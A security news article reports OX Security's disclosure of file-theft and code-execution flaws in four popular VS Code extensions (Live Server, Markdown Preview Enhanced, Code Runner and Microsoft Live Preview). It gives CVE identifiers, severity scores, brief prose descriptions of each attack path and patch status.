Cybersecurity researchers have uncovered serious security vulnerabilities in four widely used Microsoft Visual Studio Code extensions. These flaws could allow attackers to steal sensitive local files and remotely execute malicious code on developers’ machines.
The affected extensions, installed more than 125 million times collectively, include Live Server, Code Runner, Markdown Preview Enhanced, and Microsoft Live Preview.
Security experts from OX Security, Moshe Siman Tov Bustan and Nir Zadok, shared their findings with The Hacker News, warning that a single vulnerable or malicious extension is enough to enable lateral movement inside enterprise environments, potentially leading to full organizational compromise.
Breakdown of the Identified Vulnerabilities
CVE-2025-65717, Live Server, CVSS 9.1
This critical vulnerability enables attackers to extract local files. If a developer visits a malicious website while the Live Server extension is active, embedded JavaScript on the page can interact with the local HTTP development server running at localhost:5500. The script can crawl accessible files and transmit them to an attacker-controlled domain.
Status, Unpatched.
CVE-2025-65716, Markdown Preview Enhanced, CVSS 8.8
This flaw allows arbitrary JavaScript execution through a specially crafted markdown file. Once opened, the malicious file can enumerate local ports and exfiltrate sensitive data to an external server.
Status, Unpatched.
CVE-2025-65715, Code Runner, CVSS 7.8
Attackers can exploit this vulnerability by tricking users into modifying the settings.json configuration file through phishing or social engineering techniques. Once altered, arbitrary code execution becomes possible.
Status, Unpatched.
Microsoft Live Preview Vulnerability, No CVE Assigned
A separate issue in Microsoft Live Preview allowed attackers to access sensitive files by exploiting specially crafted JavaScript requests targeting localhost services. Victims only needed to visit a malicious webpage while the extension was running.
Status, Silently fixed in version 0.4.16 released in September 2025.
How These VS Code Extension Flaws Impact Developers and Organizations
These vulnerabilities demonstrate how development environments can become entry points for cyberattacks. Since VS Code extensions often operate with elevated permissions, poorly secured extensions can:
- Execute arbitrary code
- Modify project files
- Access local development servers
- Exfiltrate sensitive data
- Enable lateral movement within enterprise networks
According to OX Security, even one vulnerable extension can pose an immediate security risk. A single malicious repository, click, or configuration change could compromise an entire system.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
